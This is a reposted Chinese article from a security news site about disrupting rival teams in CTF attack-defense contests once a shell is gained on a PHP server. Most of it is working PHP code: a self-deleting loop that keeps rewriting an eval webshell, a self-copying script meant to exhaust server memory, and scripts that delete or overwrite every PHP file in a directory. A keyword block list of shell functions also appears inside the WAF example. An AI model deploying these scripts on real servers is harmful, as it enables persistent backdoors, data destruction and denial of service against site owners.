CTF
首页 > 安全文摘 > CTF> 正文

论如何在CTF比赛中搅“shi”

0×00 前言不能搅”shi”的CTF不是好CTF,不能搅”shi”的题目不是好题目。我很赞成phithon神的一句话,“比赛就是和他人竞争的过程,通过各

作者:Kong来源:www.freebuf.com|2016-10-31 15:22:05

0×00 前言

不能搅”shi”的CTF不是好CTF,不能搅”shi”的题目不是好题目。

我很赞成phithon神的一句话,“比赛就是和他人竞争的过程,通过各种手段阻止对手拿分我觉得也是一种能力。”

你能够做到别人做不到的,那就是你的本事。

本文所说的搅屎是在GETSHELL的情况下才能进行的!!!遇到phithon师傅的《CTF主办方指南之对抗搅屎棍》就GG了

0×01 预备知识

大多数能够搅屎的题目基本上是PHP且需要getshell的。所以,必备的PHP语法基本只是必须要懂~

接下来是介绍一些特殊的PHP内置函数

ignore_user_abort()

设置客户端断开连接时是否中断脚本的执行

PHP以命令行脚本执行时,当脚本终端结束,脚本不会被立即中止,除非设置 value 为 TRUE,否则脚本输出任意字符时会被中止。

ignore_user_abort(1);

set_time_limit()

设置脚本最大执行时间

设置允许脚本运行的时间,单位为秒。如果超过了此设置,脚本返回一个致命的错误。默认值为30秒,或者是在php.ini的max_execution_time被定义的值,如果此值存在。

set_time_limit(0);

ini_get()

获取一个配置选项的值

成功时返回配置选项的值。

echo 'disable_functions='.ini_get('disable_functions');

file_put_contents()

将一个字符串写入文件

和依次调用 fopen(),fwrite() 以及 fclose() 功能一样。

file_put_contents($filename, $content);

file_get_contents()

将整个文件读入一个字符串

和 file() 一样,只除了 file_get_contents() 把文件读入一个字符串。将在参数 offset 所指定的位置开始读取长度为 maxlen 的内容。如果失败,file_get_contents() 将返回 FALSE。

当然这个函数也可以通过其他协议读取文件内容

file_get_contents($filename);

file_get_contents($url);

file_put_contents()

将一个字符串写入文件

和依次调用 fopen(),fwrite() 以及 fclose() 功能一样。

file_put_contents($filename, $content);

unlink()

删除文件

删除 filename。和 Unix C 的 unlink() 函数相似。 发生错误时会产生一个 E_WARNING 级别的错误。

unlink($filename);
给你的PHP脚本加上set_time_limit(0);ignore_user_abort(1);这两句就能够做的常驻内存了。

对待这种情况,基本上只能重启PHP了。

0×02 搅屎之不死鸟

no_die_shell.php

<?php

    set_time_limit(0);

    ignore_user_abort(1);

    unlink(__FILE__);

    //file_put_contents(__FILE__,'');

    while(1){

        file_put_contents('path/webshell.php','<?php @eval($_POST["password"]);?>');

    }

?>

首先就是删除自己,不让别人知道,然后在某一个目录下循环生成你的webshell,根本删不掉~~

0×03 搅屎之核弹

nuclear_bomb.php

<?php

    set_time_limit(0);

    ignore_user_abort(true);

    while(1){

        file_put_contents(randstr().'.php',file_get_content(__FILE__));

        file_get_contents("http://127.0.0.1/");

    }

?>

根据代码,不难看出这个脚本的功能。

常驻内存之后,进入死循环。

循环内部是实现无效複製自身并且访问web服务的功能。

执行的后果就是内存爆炸,php就GG了,严重点的话,Docker也GG。

0×04 搅屎之你死我活

del.php

<?php

    set_time_limit(0);

    ignore_user_abort(1);

    array_map('unlink', glob("some/dir/*.php"));

?>

del_or_change.php

<?php

    set_time_limit(0);

    ignore_user_abort(1);

    unlink(__FILE__);

    function getfiles($path){

        foreach(glob($path) as $afile){

            if(is_dir($afile))

                getfiles($afile.'/*.php');

            else

                @file_put_contents($afile,"#Anything#");

                //unlink($afile);

        }

    }

    while(1){

        getfiles(__DIR__);

        sleep(10);

    }

?>

遍曆目录,得到所有的php文件,然后至于你想改写内容还是直接删掉,看心情了。

遍曆目录的方法很多,但是大多数这些函数都被禁用了(disable_functions)。

偶尔有个别漏网之鱼,比如glob~~这个函数比较少见吧。所以这样就用了它。

如果删除函数unlink被ban掉就改写咯

0×05 搅屎之WAF

感觉这个杀器有点邪恶。对于线下赛来说,近乎于无敌,反正我自己没有什麽好的方法破解。

噁心人啊。

php_waf_and_log_to_txt.php

<?php

    error_reporting(0);

    define('LOG_FILENAME','log.txt');

    function waf()

    {

        if (!function_exists('getallheaders')) {

            function getallheaders() {

                foreach ($_SERVER as $name => $value) {

                    if (substr($name, 0, 5) == 'HTTP_')

                        $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;

                }

                return $headers;

            }

        }

        $get = $_GET;

        $post = $_POST;

        $cookie = $_COOKIE;

        $header = getallheaders();

        $files = $_FILES;

        $ip = $_SERVER["REMOTE_ADDR"];

        $method = $_SERVER['REQUEST_METHOD'];

        $filepath = $_SERVER["SCRIPT_NAME"];

        //rewirte shell which uploaded by others, you can do more

        foreach ($_FILES as $key => $value) {

            $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);

            file_put_contents($_FILES[$key]['tmp_name'], "virink");

        }

        unset($header['Accept']);//fix a bug

        $input = array("Get"=>$get, "Post"=>$post, "Cookie"=>$cookie, "File"=>$files, "Header"=>$header);

        //deal with

        $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";

        $pattern .= "|file_put_contents|fwrite|curl|system|eval|assert";

        $pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";

        $pattern .="|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";

        $vpattern = explode("|",$pattern);

        $bool = false;

        foreach ($input as $k => $v) {

            foreach($vpattern as $value){

                foreach ($v as $kk => $vv) {

                    if (preg_match( "/$value/i", $vv )){

                        $bool = true;

                        logging($input);

                        break;

                    }

                }

                if($bool) break;

            }

            if($bool) break;

        }

    }

    function logging($var){

        file_put_contents(LOG_FILENAME, "\r\n".time()."\r\n".print_r($var, true), FILE_APPEND);

        // die() or unset($_GET) or unset($_POST) or unset($_COOKIE);

    }

    waf();

?>

这个WAF在线下攻防赛中,绝对是一个大杀器。

不仅拦截了大多数非法语句,还能记录所有的攻击流量,轻松得到别人的payload。

不知道主办方要如何解决这个WAF所存在的问题。

当然,这个WAF应该也不是完美的,还可以添加更多的规则,让他变得更强!

接下来再说说,在实战中如何加载这个WAF。

根据权限不同,就有不同的加载方式。

有root权限

那麽,这样就简单了,直接写在配置中。

vim php.ini

auto_append_file = “/dir/path/phpwaf.php”

重启Apache或者php-fpm就能生效了。

当然也可以写在 .user.ini 或者 .htaccess 中。

php_value auto_prepend_file “/dir/path/phpwaf.php”

只有user权限

没写系统权限就只能在代码上面下手了,也就是文件包含。

这钟情况又可以用不同的方式包含。

如果是框架型应用,那麽就可以添加在入口文件,例如index.php,

如果不是框架应用,那麽可以在公共配置文件config.php等相关文件中包含。

include('phpwaf.php');
还有一种是替换index.php,也就是讲index.php改名为index2.php,然后讲phpwaf.php改成index.php。

当然还没完,还要在原phpwaf.php中包含原来的index.php。

index.php -> index2.php

phpwaf.php -> index.php

include('index2.php');

至于你想用哪种方式,看你心情咯,你开心就好。

0×06 结束语

写这篇文章的目的并不是让大家都去CTF搅屎,毕竟CTF是一个正规的比赛的地方,有助于我们学习更多的技术以及黑科技。

当然,服务器维护人员也是很辛苦的。

我们暴打出题人就好了,何必为难运维。(出题人就是运维的情况下,例外!!!)

希望大家用正确的心态看这篇文章,“PHP是世界上最好的语言”,能够挖掘的地方还有很多。

主办方,表打我欸。

【责任编辑:Kong 】

分享:

安全快讯+更多

多少次,她说是在工作,但是诡异的第六感告诉我们,她在撒谎...
安识科技,是一家专注于账号安全、企业风险评估的技术型企业。旗下拥有基于云+端的自研产品多因素令牌、基于多重检测引擎的伏特漏洞扫描云平台等!
近日,国家信息安全漏洞共享平台(CNVD)收录了CNVD白帽子(ID:ayound)报送的Jackson框架enableDefaultTyping方法反序列化漏洞(CNVD-2017-04483)。
又公开了一波NSA黑客工具,可供下载;Word曝0day漏洞,打开文档就自动安装恶意程序;iOS 10.3.1高危WiFi芯片漏洞.
由上海GRCC公司主办,美国AutoHarvest协会、上海市信息服务业行业协会协办,由美国新思科技(Synopsys, Inc)、Green Hills Software, Inc.等联合赞助的2017 第二届中国汽车网络信息安全峰会于2月23日-24日在上海浦东顺利召开。